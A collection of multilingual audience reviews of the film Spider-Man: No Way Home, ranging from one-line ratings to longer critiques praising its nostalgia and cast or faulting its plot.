An amazing and incredible premise done perfectly in live action. The best cinema experience of my life. There were some issues but man do I not care.
This movie turns me on
This is the GOAT. The GOAT. Best phase 4 movie.
Não tenho palavras pra sensação que esse filme me trouxe.
Ver os 3 aranhas juntos é incrível. Fora que o filme é cheio de referências postas de um jeito bem inteligente. O filme finalmente trás para o Aranha de Tom Holland a dor da perda, que nesse aranha, tanto de sua tia, mas, também de todos que ele conhecia. Isso pra mim abre uma possibilidade incrível de reconstruir um personagem como alguém mais crescido e sério.
This is the best Spider-Man movie and best MCU movie ever. It could've just been a bunch of cameos with no plot or emotional core and I would've loved it still, but instead, it had so many amazing cameos AND so many amazing emotional moments. I truly don't understand how someone could watch this and not love it.
Despite a rough first half and some poor pacing, Spider-Man: No Way Home is a must-watch for Spidey fans while also offering a great conclusion (for now) to Tom Holland's Spider-Man.
Wasn't perfect but in my opinion bringing back a lot of the OGs makes it close. I'm a huge fan of bringing back legends from the past for big projects like this one. It'll be interesting to see where the series goes from here.
O filme é, exclusivamente, serviço para os fãs, o roteiro faz um dos magos, supostamente, mais poderoso e sábio do mundo tomar uma decisão infantil, depois ele começa a brigar de igual para igual com o amigo da vizinhança e ainda perde. Daí para frente ainda ocorre um show de conveniências e toda sequência dos criminosos na casa é tão inverossímil dentro do próprio universo do aranha que chega a indignar. O filme não me divertiu, eu não me importo se o Peter do Tom Holand morre ou não, a parte mais divertida foi a participação dos dois Miranhas, especialmente o Andrew Garfield
Overrated but still pretty good
Spider-Man No Way Home is spectacular & it's proof Jon Watts should be connected to more MCU projects.
Pretty good but not the best spider man movie for me.
Spiderman No way home
Spiderman is a movie directed by Jon Watts. The main character of the movie is Spiderman a man who have the power of a spider. The films is about Spiderman and Dr strange protect the world against different vilain and enemmy in the city. The plot are unpredictable because the action are quicky.
I love the special effect like when dr strange fly and use his portal for teleport, the effect are stunning at the start when a big creature attac' the city. The movie look like really good to watch with a lot of work on design and the capture. The acting are really good especially for Tom holland who incarned spiderman. The whole script is interresing but a little repetive but a big surprise at the end i can't say more. Generaly i find this movie really cool it was a good movie by marvel and a nice story
i like this movie, very good
My Fav movie. Tom Holland absolutely nails peter parker
Spider-Man No Way Home manages to give people a feeling of nostalgia and fan service that has not been felt since 2019 with Avengers: Endgame. Bringing back many familiar faces, having higher stakes than usual for Spider-Man, and telling a warm and emotional story makes this one of the best superhero films of all time.
el fanservice,el desarrollo del spidy de tom con ayuda de sus variantes que amamos,el regreso de villanos entrañables y la actuación de william dafoe hacen a esta pelicula magnifica
I was in love when I watched this film first time, but after rewatch I really dont like this movie. Tobey, Andrew and Tom togheter are amazing. Green Goblin was great as a main villain, but plot is make no sense for me.
Ótimo filme.
Da amadurecimento para o personagem do Peter Parker algum que é muito bom e tem a nostalgia em reve os outros homens aranhas
The best Spider-Man movie in the Tom Holland trilogy, From dawn till dusk this movie hooks you and won't let go!!
I watched it like 20 times and its still a entertaining movie. I like to see the multiverse concept like that. Very nice movie and beautifully written. To see the poor Peter Parker in the future movies is awesome, lets hope they keep up with that.
It's amazing I love it
Great film, bringing back the other Spideys is genius. Real pathos at the end.
Hands down the best movie of all-time! And no, I don't say this only for the nostalgia of the return of Tobey Maguire, Andrew Garfield and their villains. And Matt Murdock, not to forget. No, this movie had EVERYTHING! Even if you put off the nostalgia glasses, you still have a cinematic masterpiece unlike any other! Tom Holland as Peter Parker/Spider-Man gave the performance of his lifetime, deservedly belonging to the row of top-tier actors of this century! Zendaya as MJ and Jacob Batalon as Ned Leeds acted very well too! The inclusion of Benedict Cumberbatch of Doctor Strange wasn't a mistake either: the dynamic between Parker and Strange is a really good one! This isn't just your action-packed superhero blockbuster, this movie deserved that Best Picture Oscar! But yeah, as long as Martin Scorcese and the Academy are around superhero movies will never get the fame they rightfully deserve!
I like the movie because it has the two spider mans from the original trilogy and the amazing Spiderman. It is the best Spiderman movie but into the spider verse is better.
I can not start by saying this movie is one of the best movie I have ever seen. It has a stellar cast with a good skrip and some good villains 🦹‍♀️ I already seen it five times.
respectfully my fav movie of all time
Aside from its conversations and scene editing being poorly optimized, No Way Home is still a fun movie to watch regardless of being new or someone who knows how Spider-Man films in the MCU play out.
I enjoyed it so much! It was a pleasant experience to see this one in the movie theater.
3 generations of Spider-Man fans coming together. I guess one movie CAN make a difference. Nuff' said.
Everything it's Spiderman
Questo è un capolavoro epocale. Ho adorato tutto: i combattimenti, uno dei migliori colpi di scena di sempre, una delle morti più tristi di sempre, i tre attori di spiderman insieme, cattivi fighi e il protagonista che vuole salvare i cattivi e non ucciderli.
Questo è il mio film preferito.
Esta podría tratarse de sin duda una de las mejores entregas de la fase 4 del MCU, así como una de las mejores películas de Spider-Man. Por más que Tom Holland siga siendo la estrella, aquí tenemos una reunión de muchos de los personajes de la trilogía original de Tobey McGuire y la saga de Andrew Garfield. Un excelente elenco y toda una avalancha de buenos efectos especiales y escenas de acción, esta película logra cumplir las expectativas de los fans de Spider-Man. El punto más fuerte de esta película es sin duda la nostalgia de quienes crecieron con las películas de Tobey McGuire y Andrew Garfield. A ellos se les ha otorgado una nueva oportunidad y muchos de los actores de los villanos han logrado mantenerse fieles a sus personajes después de años. El guion puede ser cuestionable, pero eso deja de tener importancia alguna. Esta película es una experiencia emocionante que solo los verdaderos fans de Spider-Man o Marvel saben apreciar. Mi calificación final para esta película es un 10/10.
Amazing with all the Spider-Man actors all together!
Achei o filme incrível em todos os sentidos, uma verdadeira obra de arte, um sonho de muitos fãs do homem aranha como eu, realizado, os três juntos enfrentando os vilões, interagindo um com o outro, um encontro de gerações, Toby, Andrew e Tom, foi perfeito, sem contar os vilões clássicos de cada Homem aranha.
Not much to explain here except the first 40 minutes is not as good as the last bit. The setup is lazy but the rest of it is so fun and so entertaining, this is a love letter to Spider-Man fans.
ITS WAS amazing, I don't care what some people say this movie was not carried by nostalgia, great story from start to finish, I saw this movie opening night and I don't regret it.
i like peter's growth and learned a lesson of his variants
Great Spider-Man movie and the return of the villains are great.
Such a fantastic Spider Man movie that is just as thrilling as it was the first time. By far the highlight of Post-Infinity Saga MCU!
Despite what others have said, it feels like Tom Holland was born to play Peter Parker/ Spider-Man. Make no mistake, I didn't hate the previous actors and their turn as the web-slinger, quite the opposite. I just feel Holland's natural persona and charisma fit better for the character. So... (I figure the cat is out of the bag by now) the inclusion of the previous iterations of Spider-Man in No Way Home, something ripped straight from the comics, was a no-brainer. DC and Warner Bros. have used actors to reprise roles in TV projects for years now, so the concept isn't new, but seeing Tobey Maguire and Andrew Garfield back in screen as their versions of Peter Parker/Spider-Man felt special. But they didn't stop there. They also brought back Molina, Foxx and Defoe to reprise their iconic villain roles and even Charlie Cox to reprise his role as Matt Murdock Netflix's Daredevil. With this many cameos, one could be forgiven for letting the story fall by the wayside, but actually, the movie benefited from their inclusion. So, if you haven't seen the movie, I recommend it.
Not a fan of recycling old actors just to save money
It's a little off-putting to see Dr. Strange reduced to comic relief, but Spiderman remains strong and the ending is triumphant.
Me parece una película que logró lo impensable, pero no será tan impresionante en unos años porque es una película que se centra en darle a los fans lo que quieren, y eso está bien, pero no en cada momento de la película.
La nostalgia dió al corazón en esta película
5 stelle soltanto perché questo film mi lasciò delle emozioni indescrivibili,sia prima di guardarlo che dopo. 
Se dovessi essere oggettivo, le stelle sarebbero 3 (nel film vi sono tanti errori e problemi di ogni tipo). Ma il vibe che ci regalò a tutti noi fan fu indescrivibile!
Penso che vedere i 3 spider man insieme sul grande schermo abbia fatto scendere una lacrimuccia di nostalgia a quelli più vecchi e abbia fatto salire un pizzico di adrenalina ai più giovani.
"Spider-Man: No Way Home is a thrilling and emotional conclusion to Tom Holland's trilogy as the friendly neighborhood hero. The film picks up where Far From Home left off, with Peter Parker's identity exposed to the world by Mysterio. Desperate to undo this mess, Peter turns to Doctor Strange for help. However, when Strange's spell goes wrong, Peter must face five deadly villains from other universes–the Green Goblin, Doctor Octopus, Electro, Sandman and Lizard–while also trying to protect his loved ones and his future. In the film, we see Peter Parker (Tom Holland) teaming up with previous Spider-Man versions played by Andrew Garfield and Tobey Maguire to stop villains from other universes."

"The film is a spectacular showcase of action, humor and heart, with stunning visual effects and a brilliant cast. Holland delivers his best performance yet as Spider-Man, showing his growth as a hero and a person. He is supported by Zendaya as MJ, Jacob Batalon as Ned Leeds, Benedict Cumberbatch as Doctor Strange, and Marisa Tomei once again stealing the show as Aunt May. The cast members have great chemistry and moments with each other. The film also features the return of Tobey Maguire and Andrew Garfield as their respective versions of Spider-Man, creating an epic crossover that fans have been dreaming of. The three Spideys share a wonderful bond and camaraderie, while also bringing their own unique personalities and experiences to the table."

"The film also does justice to the villains, who are more than just CGI monsters. Willem Dafoe steals the show as Norman Osborn/Green Goblin, reprising his role from Sam Raimi's Spider-Man (2002). He is menacing, manipulative, and tragic, posing a serious threat to Peter both physically and mentally. Alfred Molina also shines as Dr. Otto Octavius/Doctor Octopus, who gets a chance to redeem himself after being corrupted by his tentacles in Spider-Man 2 (2004). Jamie Foxx has a more prominent role and personality as Max Dillon/Electro than he did in The Amazing Spider-Man 2 (2014), while Thomas Haden Church and Rhys Ifans reprise their roles as Flint Marko/Sandman and Dr. Curt Connors/Lizard, respectively. Additionally, the film's stunning visuals bring the various Spider-Man universes to life, with the special effects being particularly noteworthy. The pacing is also well done, with the film's action sequences being expertly choreographed and executed."

Director Jon Watts has done an excellent job in crafting a film that will please both die-hard fans of the comics and casual audiences alike. The film's themes of responsibility and redemption are well handled, and the inclusion of characters from previous films adds a sense of nostalgia to the proceedings. The film's finale is particularly satisfying and leaves audiences eager for more.

Overall, though, "Spider-Man: No Way Home" is an ambitious and satisfying finale that pays homage to the past while looking forward to the future. It is a must-see for fans of the franchise and superhero movies in general. The film is masterfully crafted, expertly balancing action, emotion, and humor. It will leave you feeling exhilarated and emotionally invested in the characters and their struggles. The movie balances fan service with storytelling, delivering surprises that are earned rather than forced. It celebrates what makes Spider-Man such a beloved character: his courage, compassion, and responsibility. It also reminds us that being Spider-Man comes with a price – a price that Peter must be willing to pay if he wants to be true to himself. "Spider-Man: No Way Home" is a film that has truly resonated with me, and I highly recommend it to anyone looking for a great cinematic experience.
awesome theater experience
Marvel manages to produce a very compelling follow up to the biggest cinematic event ever.
10/10 movie for spiderman fans!
Best movie in the MCU! Just being able to see all 3 spiderman on the big screen was amazing and earnt fan service! Everything about this movie was great and even the set up, which most people didn't like, I thought made sense and helped the plot move forward. Also, Electro really redeamed himself and William Dafoe as Green Goblin was so great to see again! Overall, an amazing film and definitly the best in the MCU!
Fantástico! Como fiquei feliz em assistir esse filme!
Great effects but not a great storyline or character development coming from Spiderman as expected. Toby Maguire and Andrew Garfields appearance don't add any value to the movie just a facade to the fans.
Favorite movie of the spiderverse, and marvel universe.
(Spoiler free with hype) Spider-Man: No Way Home isn't for casual viewers. But it has everything Spider-Man fans want and will leave smiling. The story is messy but you will forget about it. The ending is perfect and captures what it is to be Spider-Man unlike Tom Holland's past movies. Some jokes feel forced but they're still good. I enjoyed the movie and it might be my favorite of all time. If you like this one I recommend watching Sony's Into The Spider-Verse.   It's made with lots of quality and hidden details.
This movie pulled all the right stops, but it's also like I got hit by a nostalgia bus.

It has some of the top action sequences in all of the MCU. Spidey going at it with Green Goblin was absolutely insane. 

They did miss the perfect chance to have the Sinister 6, but other than that this is the best Phase 4 movie, and one of the best MCU movies.
Mis respetos para esta película, una obra de arte
A love letter to spider-man fans, and a damn good one at that.
This film was absolutely amazing, I had been waiting for this film all year with a large tension revolving around it. When it finally came, it was amazing. The way Tobey, Andrew and Tom all worked together was brilliant. I'd also like to say that Willem Dafoe (Green Goblin) did an amazing job portraying this character seeing as he hadn't played it in so long. 10/10 would watch again.
One of the best marvel movie period
Film pessimo e sopravvalutato, il peggiore degli ultimi anni
This movie was fantastic and always will be
On first viewing this film is absolutely incredible, it hits all the right points and pounds you with enough nostalgia that you don't notice the little flaws and plot contrivances. However, my perception of the film definitely decreased on second viewing. Suddenly I found the first half a complete slob, filled with strange choices and unbelievable decisions. The brilliance of the second half doesn't hit quite as well either, it's still good but it just isn't quite as enjoyable. It is still a film with great emotional stakes and pay off with some truly gut wrenching moments, and one of the greatest fight scenes in modern cinema, but the set up is poor.
SPIDER MAN GALORE, nostalgic, funny, dramatic.
Ein Meisterwerk ich weiß nicht wann ich je so begeistert war
No wau hone comes very close to a perfect movie.D elivers great action, humor and heart while making the best of its caharcters
Spider-Man's great resposabilities that came with his great power finally gets him, and then we see the real Peter Parker, the real person under the spidey mask.
Absolute cinematic masterpiece. Most villains are balanced extremely well in this movie. This movie provided much appreciated nostalgia and a brilliant cinema experience. I am not sure if this movie
A movie that is made only for the sake of fanservice. No original and clever plot. Lazy and stupid cause of events and stupid ending. May Parker's death is unearned.
best movie experience I've ever had
Tom Holland's third and potentially final outing as the webbed hero is the epitome of fan service that takes Peter Parker on an emotional journey of loss and sacrifice. Jon Watts provides Marvel fans with a multiverse-sized event that manages to inject intense emotion into a high-octane franchise.

Continuing from the end of ‘Spider-Man: Far From Home', ‘Spider-Man: No Way Home' opens with the aftermath of Peter's identity being revealed and accused of murdering Mysterio (played by Jake Gyllenhaal in previous instalment of the Spider-Man trilogy). Peter now must deal with the fact that his identity is out in the world and the ensuing legal problems, and it's not long before the people around Peter soon begin to be affected by this. But when the troubled teen decides to turn to Doctor Strange (Benedict Cumberbatch) for help, what follows is an explosive, emotional chain of events that will affect Peter forever.

Jon Watts (Cop Car) brings fans of the titular hero a well-paced film that brilliantly ties up three generations of this well-loved hero. The slightly muddled plot spans over 148-minutes and allows Tom Holland to show off his abundance of talent, giving a brilliant performance that puts ‘Spider-Man: No Way Home' up there with some of the actor's best work. Even though the film's villains are ones we've seen on the big screen before, Watts manages to present them to viewers in a new and exciting way that doesn't make the film feel overstuffed and overcrowded. Oscar-winning composer Michael Giacchino returns to the Spider-Man franchise to provide the film with a magical score that takes you through every emotion alongside Peter.

‘Avatar' and ‘Southpaw' cinematographer Mauro Fiore supplies ‘Spider-Man: No Way Home' with impressive visuals that take viewers on a visual journey from New York City to the geometric mirror dimension. Fiore's cinematography works hand in hand with the film's incredible visual effects, but the effects that can't help but feel like there's a bit too much. In classic Marvel fashion, ‘Spider-Man: No Way Home' ties into some of the studios previous projects as well as the future of the expanding universe. Watt's gives audiences the first look at the multiverse in action after it was first introduced in Kate Herron's ‘Loki' and Byran Andrews' ‘What If…?'. The film then sets up upcoming projects like ‘Doctor Strange in The Multiverse of Madness' which also stars Benedict Cumberbatch as the Sorcerer Supreme.

The film sends Peter Parker on an emotional rollercoaster, forcing him to deal with themes of grief, sacrifice, and relationships. It also reiterates the struggle Peter faces as he tries to balance being a teenager with being a world-saving superhero. Despite being the darker, more emotional film in Holland's trilogy, Chris McKenna and Erik Sommers manage to keep the comedy consistent throughout. What follows the chaotic opening scene is 148 minutes of mind-blowing action and heart-wrenching emotion that makes the long wait for the film completely worth it. But even though the film's action scenes feel slightly repetitive, intense hand-to-hand combat puts an exciting twist on Spidey's normal fighting style.

This film will be a welcome addition to the previously small amount audiences have seen of Peter and MJ's (Zendaya) blossoming relationship, and even though the ending may put the couple's future into doubt, subtle glances and awkward encounters will make viewers feel optimistic about Peter and MJ's future together. The ambiguity that surrounds Tom Holland's future in the Marvel Cinematic Universe makes the film's ending a perfect send off for the character but also a perfect place to pick up from in future projects. Because by the closing scenes, we are introduced to a new Peter Parker, a version of Holland's character that feels more mature and tough.

The third film in MCU's first Spider-Man trilogy is a powerful affair that sends the friendly neighbourhood webslinger to hell and back as he tries to fix the mess he finds himself in after the events of ‘Spider-Man: Far From Home'. Jon Watts creates a film that lives up to big expectations and even goes one further. Featuring an incredible performance from Tom Holland, terrific cinematography from Mauro Fiore and great direction from Jon Watts, ‘Spider-Man: No Way Home' is a spectacular film that makes it one of 2021's most exciting projects.
Best MCU movie of 2021 and best Spider Man movie I have ever seen.
This movie is decent. Maybe even good. It is certainly WAY BETTER than homecoming or far from home. But this is SO OVERRATED.
The best spiderman movie released so far
The only movie in phase 4 to actually hit hard.  Kudos
3 Generation Combined Movie
NGL waspretty as. Avatar=Better
In the film, Peter Parker asks Dr. Stephen Strange to help him make his identity as Spider-Man a secret after it is publicly revealed, leading to the rupture of the multiverse by allowing five supervillains from alternate realities to enter. to the Peter Parker universe.

 My dad is a Spiderman fan, and since I was little he took me to the movies every time a new movie came out, so I ended up loving it too. Spider-Man: No Way Home is my favorite movie and what I liked the most was the appearance of the "old Spier-Mans" as I call them. I found it very nostalgic and exciting to see them all fight together. Also, one thing I love about this movie is the beautiful romance between Peter Parker and MJ and especially how each one plays their character. It's amazing!

 In conclusion, I think it's a very good movie, not only because of the incredible actors it has, but also because of the fantastic special effects, the quality of the movie, and the wonderful plot. When I finished watching it, I quickly searched for when the next movie was coming out because the ending left me wanting to see more and see what happened, especially for the two of them. I highly recommend this movie as you can find action, romance, fantasy, comedy and even intrigue in it.
Awesome movie especially for the people who grew up with Andrew or Tobey as spiderman
Amazing  movie no pun intended
Not cinema. Liked the "youth pastor" joke, though.
Great Movie! prob one of the best in the new spider man line but I also feel like this one will be the last (not ganna spoile it but yah) liked a lot of parts and didn't like a few parts as much, but its a spiderman film, you cant hate it to much.
No way home forever I'm watching it 5 times never bored 3 spidermans united this is what true emotions what sony brings us!
One of the best Marvel's movies the drama, the suspense and the roller coaster ride it takes you through all the time is just Amazing. Loved it. On the top of everything Tobey's Spider-man 1 was the first Marvel movie I had watched in theatre when I was a kid and since then no one had beaten those performances. Watching him doing a come back just brought back old memories. Just loved it!!!
Not impressed. I found it bland, predictable and boring.
genius interplay of action, fan-service, continuity and story telling. bravo
One of the best Marvel films we had, has an amazing plot, and I love the characters in the film.
I love it,  spider-man no way home it's the best marvel action flim yet , and so much I will say it's 10.10 of my ranting for spider-man no way home review for a starter . If Stan Lee was here , he would spider-man is our true believer and our friend , spider-man is truly our hero ... this marvel flim should be , MOIVE OF FHE YEAR for the start, and for the 2018 spider-man game , it should be PlayStation of the year , that's hoe I put in this words ...
Nostalgia 10/10. Plot 3/10. Fun movie but you kind of have to ignore the fact that nothing actually makes sense
It's a good movie, probably the best MCU movie since Avengers Endgame. However, the end kinda disappointed me, I don't know if it was misunderstood by me or if it actually was bad, I thought that Holland's Peter didn't learned the lesson given by Garfield's and Maguire's Peters. Anyway, if you like the old Spider-Man movies (from Tobey and Andrew) you may really like this movie, definitely good and the best one from Tom Holland's Spider-Man (not that the others were bad, but this one definitely was the best out of the two other ones).
Boring and nothing new...nothing to add really
Even if Tobey Maguire and Andrew Garfield didn't show up, it would still be a great movie.
Great seeing the villains and other spider-mans of the Maguire and Garfield series joining the Holland trilogy. Marvel's best movie since Endgame in my opinion.
My favourite movie of all time! Between the visual effects, the story, the plot twists. It was all an amazing experience, especially seeing it in 3D! All the cast did an amazing job! The best MCU movie in a while!
God, I love Spider-Man and this movie gives me goosebumps just thinking about it. It's SO good!
This is one of the best movie I've seen! Love the story, its emotional weight. It's just Awesome!
Absolutely amazing film, it leaves you wanting so much more. The visuals are stunning, the plot is excellent although could become hard to follow if you aren't paying full attention. But wonderful film.
probably the best thing  I have ever seen
Great film but some flaws like J Jonah Jameson being in the Tom Holland universe and the Tobey Maguire universe, also very convient towards the end, some scenes felt forced but aside from all that, acting was the best yet from all cast, some great action scenes, and as far as nostalgia goes 10/10, awesome movie but it was definetely a fan service of which I'm not complaining as it was still very enjoyable just the plot was a slight bit medicore.
Otra película de mohana la spider-man una y me voy para los 13 spider-man está dando y los moneda película
Nostalgia about past movies and characters isn't a story. And this story is about as corny as it gets -- and it doesn't have the juice.
THE BEST SPIDER-MAN MOVIE AND MY FAVORITE SUPERHERO MOVIE
This movie is the G.O.A.T
Perfeito, principalmente pela a nostalgia da infância
As Marvel phase 4 has come to an end, I consider no way home as the best Marvel movie after Endgame. First of all, this movie has chosen a really interesting topic that will draw the audience's attention together as it gathered all the elements from the previous two spiderman movies. Even though it's been a long time, the movie still left remarkable characterics and features in each of the villans. The plot was smooth and excuted well. Unlike Black Widow, the movie doesn't have unnecessary scenes and it also comes with great actions. This movie also symbolises the growth of Peter Parker. Enjoy
Overall, as the most anticipated film for all Marvel and Spider-Man fans, I am excited to announce that this is a tremendous film. Filled with many exciting and breathtaking surprises, No Way Home is packed with a touching new story and great action sequences.  Tom Holland himself delivers what I deem is his best version of the web-slinger to date. Treat this film as a wild theme park ride- you'll clap, you'll scream, you'll smile, and, in the end, you'll be left with the sensation that you could easily go again and again.
I loved that they added Doctor Strange in here. The ending made me leave the theater crying my eyes out. Hopefully they will make a next one. Super great movie!!
This is a Well-Written Marvel Movie
I feel like this such an intriguing movie and it leaves you enjoying it throughout the whole thing, all of the characters keep you greatly invested
one of the best spiderman movies
This is a good Spiderman movie because you get to see old villains from your childhood! However, the plot is super basic and you don't really care what happens to Peter (Tom Holland). Watch this if you can, but it won't really matter if you don't.
I liked this movie, well written good special effects a typical Marvel movie at its best. 
also, the humor was very funny in places, typical of a good spiderman Movie :-)
Fan service done right
best of the three MCU spidey films, tugs at the heart and lives up to the hype!
The movie is just great, not because of the old characters only. The acting is just great and shows the real start of Spider-Man! The first two movies are like the origin story of him
No Way Home is something that I really super excited back in the day.. And here it is, one of the best MCU movies in Phase 4 to date. A massive fan-service that has an extraordinary story, and tons of amazing actions that fans are hoping to see for, and the movie experience? It was spectacular, indeed. Also I love seeing the three Spideys interacting with each other, making this film successful. 
Overall, Spider-Man: No Way Home is one of those films that are worth rewatchable after seeing it in the cinema. 10/10
It took me several days to watch this. And to steal this phrase Its Amazing. Its just a fun movie with plenty of plot and great actors from past movies..
Best Spider-Man Movie since Spider-Man 2. A lot of nostalgia combined with action-packed fun and glory make this film a memorable masterpiece. It's great seeing all the iconic actors like Tobey Maguire and Andrew Garfield return🎉
It was a tear jerker. Loved it hope they make another trilogy
It's my favourite movie, i love it! All Spider-man together are fantastic and It's one of most beautiful century's movies
Does it have plot holes? yes. Do i care? NO. While it does have some problems, they are so easy to overlook because the movie its just that good. The action, while very CGI-heavy, is so fun, the fan-service is so well integrated into the plot. It serves the story of the movie and fells almost essential. Its everything a fan of the character could ask for.
One of the better Marvel movies that has been made. It lived up to the massive hype. This is one of those movies that is a must see with a crowd in a theatre or with your friends/family. It is so much fun!
Story beats are inconsistent with each other, but there are many emotional and/or nostalgic moments.
A pesar de tener varios agujeros en la trama teniendo un guión parecido más a una fanfiction (algo que me termina molestando mucho), Spiderman No Way Home termina en algo sorprendente y satisfactorio.
Very well done movie. Incredible they were able to orchestrate the original three Spider Man actors into one movie so seamlessly. The actual story itself is what took a little hype away from it for me as I just don’t like how many times Tom Holland’s Spider Man has gotten the short end of the stick. I thought they were going to go more in the Tony Stark and Happy direction after the last Spider-Man movie, but again that’s just my personal opinion. I will definitely watch it again as a lot happened throughout the movie that is noteworthy for the series moving forward.
And... oh, I got to tell you, it was perfect. Perfect. Everything, down to the last minute details.
So I finally saw this movie. I haven't been real interested in the MCU since Endgame concluded but this had great reviews and it's Spiderman so I figured i'd give it a shot.

What the hell? This movie is the dumbest movie in the MCU. It has a plot that is so unbelievably stupid and hamfisted that I can't believe I haven't heard anyone call it out yet.

It seriously feels like every single character in this series got transformed into a complete idiot with the end goal being that MCU wanted to figure out a way to force the Multiverse into the story line because that's apparently where we're going to go after Endgame wrapped up. Doctor Strange particularly draws my ire. Really Victor, you're going to create a complicated world altering spell with massive cross universe complications potentially so that Peter's friends can get good college recommendations? Are you serious? This plot seems like it was ripped out of Rick and Morty, I'm just waiting for Rick to show up with a  "I just wanted you to see how dumb and stupid the idea of going to a "prestigious college" was." It literally seems like a comedic gag and yet this is the plot that is supposed to set up the rest  of the direction of the MCU? The absurdity of this convoluted plot is interspaced with fan service throwbacks to old Sony characters (who also act like complete idiots in this movie) and even I'll admit that I'll never grow tired of Willem Dafoe's Norman Osborne but they serve as little more than distractions to get you to not think about how stupid everything else is in the movie around them.

The action scenes are all standard Marvel fare. The stakes being so totally ridiculous and unbelievable completely drew me out of them if I'm being totally honest. I honestly just wanted to  fast forward through them so I can see what the next unbelievable turn of this windy circus show was going to be. I think this is the one area where "franchise fatigue" might actually be a thing because I just couldn't be bothered to get excited about yet another CGI fest intersperced with little witty one liners as is the MCU formula these days. Without actual stakes,  this all just felt like it could have been copy paste out of Thor Ragnarok and nothing really would have changed.

I went into this movie with pretty moderate expectations. I'm already divested from the MCU as it is, but I figured I'd give this movie a shot since it's the one that is pretty universally agreed to be a fun time and I cannot believe how disappointed I am with it. This was a VERY dumb action movie even by comic book movie standards, that feels insulting to the characters, and is a giant red flag that whatever Marvel is trying to do with the MCU without RDJ, Chris Evans and the rest in severe disarray.
The one good thing that came out of phase 4.
Best movie in Phase 4 and it's not even close. THIS is how you do fan service RIGHT.
Any spider man fan would eat this up at any time of the day, any day of the week. They truly capture the essence of this character and I would say that was probably the weakest link of Holland's spider man up to this point. The multiverse is brilliantly integrated into the film, but it is also what, in my opinion, ends up tanking the movie a little bit. By the end of this film, viewers are left with a lot of questions and hypothetical scenarios of how else the multiverse characters/storylines could have affected what actually happens, and the movie, unfortunately, doesn't bother to address these questions in any way. Regardless, it remains an entertaining movie, with a lot of heart and an insane amount of character development for this Peter Parker, and most definitely one of the best projects to come out of Phase 4.
The movie was perfect! Tobey Maguire, Andrew Garfield and Tom Holland all did a great job as Spider-Man! I love the movie!
Shockingly effective and emotionally powerful. This spiderman gives each version plenty of time to shine.
It is really good.
 Great story line. 
I will recommend everyone to watch this movie.
Just fanservice and more fanservice great GREAT movie. This is easily tom holland best portrayal of spider-man. He really gets to show his range here.
A lot of fun and great entertainment Thank you, SONY!
Spidorman so cool - Strong 7/10
Great film. Nice interaction with the older Spiderman films as well to link them all together and stop them from being redundant.
Amazing Movie. Must watch
Amazing performances from all the actors especially from Tom Holland, Willem Dafoe, and Andrew Garfield (pun intended). The movie is absolutely brilliant in showing Peter Parker's character growth and maturing. 9.5/10 movie
A very well-written film. As most that have seen this film, it includes many of the past characters of the spider-man films. The film had a good pace and did a solid job of making use of most of the numerous characters that were involved. The part where Andrew Garfield starts swinging on the pole and stripping his clothes off really got me excited. In conclusion, it was a great film and we need more of Tom Holland's spidey senses.
Nostalgia 9/10. Plot holes 5/10. Entertainment 8/10.
My favorite movie ever.
